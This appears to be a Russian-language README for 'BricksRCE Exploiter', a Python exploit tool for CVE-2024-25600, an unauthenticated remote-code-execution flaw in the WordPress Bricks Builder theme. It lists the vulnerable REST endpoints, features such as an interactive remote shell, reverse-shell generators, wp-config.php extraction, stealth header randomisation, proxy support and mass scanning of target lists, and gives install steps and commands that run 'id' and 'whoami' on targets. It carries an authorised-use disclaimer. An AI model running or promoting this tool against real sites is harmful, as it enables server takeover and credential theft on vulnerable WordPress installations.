
CVE-2024-25600 — эксплойт неаутентифицированного RCE для темы Bricks Builder для WordPress. Продвинутый фреймворк эксплуатации с интерактивной оболочкой, reverse-оболочками, загрузкой/скачиванием файлов, асинхронным сканированием, скрытым режимом, поддержкой прокси и многопоточным сканированием уязвимостей. Только для авторизованного тестирования безопасности.
Инструмент для авторизованной оценки безопасности для CVE-2024-25600
Автор: Sudeepa Wanigarathna · Инструмент: BricksRCE Exploiter v1.0
Основной скрипт: cve-2024-25600.py
[!IMPORTANT] Только для авторизованного использования. Этот инструмент предназначен для исследований в области безопасности, обучения и тестирования систем, которыми вы владеете или на которые имеете явное письменное разрешение. Несанкционированный доступ к компьютерным системам незаконен. Автор не несёт ответственности за неправомерное использование.
CVE-2024-25600 — это критическая уязвимость удалённого выполнения кода без аутентификации в теме WordPress Bricks Builder. Некорректная обработка данных, контролируемых пользователем, в REST-эндпоинте render_element позволяет неаутентифицированным злоумышленникам выполнять произвольные PHP/системные команды на уязвимых установках.
BricksRCE Exploiter (cve-2024-25600.py) — полнофункциональный инструмент оценки на Python для авторизованных специалистов по безопасности, позволяющий:
| Атрибут | Значение |
|---|---|
| CVE ID | CVE-2024-25600 |
| CVSS | 9.8 (Критическая) |
| Вектор атаки | Сеть — без аутентификации |
| Воздействие | Полное удалённое выполнение кода, нарушение конфиденциальности / целостности / доступности |
| Уязвимый продукт | Тема WordPress Bricks Builder |
| Уязвимые версии | Bricks ≤ 1.9.6 (исправлено в 1.9.6.1+) |
| Тип уязвимости | Удалённое выполнение кода без аутентификации |
| CWE | CWE-94 (Некорректный контроль генерации кода) |
| Эндпоинт | Метод |
|---|---|
/wp-json/bricks/v1/render_element | POST |
/?rest_route=/bricks/v1/render_element | POST |
render_element с вредоносной полезной нагрузкой элемента| Возможность | Описание |
|---|---|
| Обнаружение уязвимости | Подтверждает RCE с помощью контролируемого зонда на основе маркера |
| Извлечение nonce | Много методов обнаружения nonce (скрипты, исходный код страницы, мета, REST) |
| Определение версии | Определяет версию Bricks Builder через CSS / readme / REST |
| Интерактивная оболочка | Полноценная REPL с историей, автодополнением и передачей файлов |
| Режим одной команды | Выполнить одну команду и выйти (удобно для скриптов) |
| Помощники обратной оболочки | Генерация обратных оболочек bash / nc / Python / PHP / Perl / Ruby |
| Извлечение wp-config | Попытка найти и прочитать wp-config.php |
| Массовое сканирование | Асинхронное или многопоточное сканирование нескольких целей из списка URL |
| Возможность | Описание |
|---|---|
| Ограничение скорости | Настраиваемая задержка между запросами |
| Повторные попытки | Экспоненциальная задержка при тайм-аутах и ошибках соединения |
| Ротация User-Agent | Случайные отпечатки браузера на каждый запрос |
| Стелс-режим | Рандомизированные заголовки Accept-Language / Accept-Encoding |
| Поддержка прокси | HTTP, HTTPS, SOCKS5 / SOCKS5h |
| Двойные эндпоинты | Предпочитать wp-json, rest_route или оба |
| Принудительный режим | Пропустить предварительную проверку и сразу попытаться эксплуатировать |
| Богатый CLI | Индикаторы прогресса, таблицы и цветные панели через Rich |
| Возможность | Описание |
|---|---|
| Экспорт в JSON / TXT | Сохранить результаты сканирования и список уязвимых целей |
| История команд | Опциональное логирование выполненных команд |
| Файловое логирование | Постоянный bricks_rce.log плюс пользовательские пути к логам |
pipgit clone https://github.com/CerberusMrXi/WP-Bricks-Exploit-CVE-2024-25600.git
cd WP-Bricks-Exploit-CVE-2024-25600
python3 -m venv venv
source venv/bin/activate # Windows: venv\Scripts\activate
pip install -r requirements.txt
python3 cve-2024-25600.py --help
requests>=2.31.0
aiohttp>=3.9.0
beautifulsoup4>=4.12.0
lxml>=4.9.0
prompt-toolkit>=3.0.0
rich>=13.7.0
pysocks>=1.7.0 # опционально — поддержка прокси SOCKS5
Замените
https://target.exampleна лабораторную или авторизованную цель.
# Интерактивная оболочка
python3 cve-2024-25600.py -u https://target.example
# Одна команда
python3 cve-2024-25600.py -u https://target.example --cmd "id"
# Массовое сканирование
python3 cve-2024-25600.py -f targets.txt -t 20 -o results.json
# Определение версии
python3 cve-2024-25600.py -u https://target.example --detect-version
# Через прокси Burp
python3 cve-2024-25600.py -u https://target.example --proxy http://127.0.0.1:8080 -v
Все примеры используют основной скрипт:
cve-2024-25600.py
python3 cve-2024-25600.py --help
Открывает интерактивную оболочку RCE после подтверждения уязвимости цели.
python3 cve-2024-25600.py -u https://target.example
Рабочий процесс:
--force)python3 cve-2024-25600.py -u https://target.example --cmd "whoami"
Сохранить вывод команды в файл:
python3 cve-2024-25600.py -u https://target.example --cmd "id" --save-output